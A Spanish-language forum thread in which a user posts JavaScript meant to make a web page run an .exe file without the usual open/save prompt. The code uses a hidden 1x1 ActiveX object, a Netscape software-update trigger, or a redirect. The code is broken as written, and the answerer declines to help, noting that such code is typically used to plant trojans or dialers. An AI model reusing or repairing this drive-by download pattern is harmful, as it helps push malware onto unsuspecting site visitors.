Un código que nadie conoce

Tengo un código del que nadie ha oído hablar ni visto, se trata de hacer que un archivo de tipo.exe se ejecute directamente en una página web, lo e probado y no lo he conseguido ¿le puedes echar un vistazo al código?, no se si es inventado o si realmente funciona.gracias.el código es:
<Script language="javascript">
var ruta_exe='archivo.exe';
var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);
Function install() {
If ( navigator.platform && navigator.platform != 'Win32' ) {
location.replace('about:blank');
return;
}
If (bname == 'Microsoft Internet Explorer' && bver >= 2) {
document.write('<object id="ayb" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D" codebase="'+ruta_exe+'"></object>');
} Else If (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
If (trigger.UpdateEnabled) {
trigger.StartSoftwareUpdate(jarpath, trigger.DEFAULT_MODE)
} Else {
location.replace(ruta_exe);
}
} Else {
location.replace(ruta_exe);
}
}
install();
</Script>

1 Respuesta

Respuesta
1
Estos código me parecen un poco "funny"... es decir... ¿para qué quieres que un ejecutable se ejecute desde una página web? Para algo malo, fijo... porque para ello tienes que saltarte el control del navegador, o utilizar controles activeX, que es lo que hace este código...
Creo que voy a "pasar palabra" con esta pregunta, no te ofendas.
No me ofendo, pero no deberías juzgarme
Diciendo lo de para algo malo, yo ni siquiera se programar, no tengo ni puñetera idea si es programa es para algo malo, tan solo era una simple consulta a un código que me encontré y que me parecido que pudiera ser de algún interés y ponerlo en mi página como algo que hasta ahora no había visto y que hay bastantante gente que pregunta si se pueden ejecutar los archivos exe en una web para evitar el típico abrir o guardar.tan solo era eso y no hay ninguna intención oculta ni nada que se le parezca, bastante tenemos ya evitando que eso no nos pase a nosotros. Repito no me he ofendido
Tan solo esto era una aclaración. Gracias por tu respuesta.
Perdón si cometí un error; paso porque no eres la primera persona que me pregunta algo así. En general lo que se pretende con la ejecución de algo en el cliente es para meterle un toryano o un dialer o algo así, y eso no me parece bien. El código que muestras en general se usa para estas cosas.
Seguro que lo que quieras hacer con este código lo puedes hacer de otra manera más "legal".
Solo era por eso.
Siento el equivoco si te ofendí.

Añade tu respuesta

Haz clic para o

Más respuestas relacionadas